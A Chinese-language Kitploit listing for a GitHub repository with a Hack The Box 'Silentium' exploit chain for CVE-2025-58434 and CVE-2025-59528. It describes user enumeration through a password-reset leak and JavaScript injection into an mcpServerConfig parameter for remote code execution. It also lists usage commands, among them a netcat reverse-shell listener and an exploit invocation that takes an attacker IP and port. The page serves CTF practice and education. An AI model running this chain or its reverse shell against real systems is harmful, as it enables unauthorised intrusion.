Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-58434-59528-htb-ctf — 利用 Silentium HTB-CTF | Kitploit
工具/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Payload生成漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

利用 Silentium HTB-CTF

查看仓库
224个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-58434-59528-htb-ctf

Silentium 利用链

本仓库包含针对 Hack The Box 中 Silentium 机器的完整利用链。该漏洞利用分两个阶段:用户枚举和 JavaScript 注入,以实现 远程代码执行(RCE)。

📝 描述

该漏洞链包含一个信息泄露缺陷和一个关键代码注入。首先通过密码重置漏洞枚举有效用户,从而获得攻击 customMCP 端点所需的上下文信息。RCE 是通过将恶意 JavaScript 函数注入到 mcpServerConfig 参数中实现的,该函数由 Node.js 后端执行。

🛠️ 功能

  • 用户枚举:使用字典自动发现有效的系统邮箱。
  • JavaScript 注入:利用 IIFE(立即调用函数表达式)绕过过滤。
  • TCP 反向 Shell:通过 mkfifo 管道生成稳定的 Shell。
  • Payload 自动化:自动处理所有 JSON 转义和 Bearer Token 认证。

🚀 要求

你必须安装 Python 3 和 Bash,以及以下库:

pip install requests

💻 使用方法

1. 枚举用户

运行枚举脚本(Bash)来查找有效账户(需要 users.txt):

python3 CVE-2025-58434.py

2. 启动监听器

在你的本地机器上启动 Netcat 监听器:

nc -lvnp 4444

3. 运行利用

执行 Python 脚本,提供目标地址、你的 IP 和获取到的 API 密钥:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ 参数

⚠️ 免责声明

此脚本仅用于教育目的和 CTF 环境中的授权渗透测试。未经授权访问或攻击目标是违法的。


挑战: Silentium(Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528

下载工具
参数描述必需
-t, --target目标主机是
-k, --keyAPI Bearer Token是
-l, --lhost你的监听器 IP(VPN)是
-p, --lport你的监听器端口是